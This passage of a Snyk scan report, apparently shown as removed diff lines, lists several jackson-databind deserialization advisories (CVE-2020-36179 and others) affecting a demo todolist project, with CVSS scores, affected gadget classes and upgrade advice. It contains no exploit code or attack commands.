"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": 
"3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ 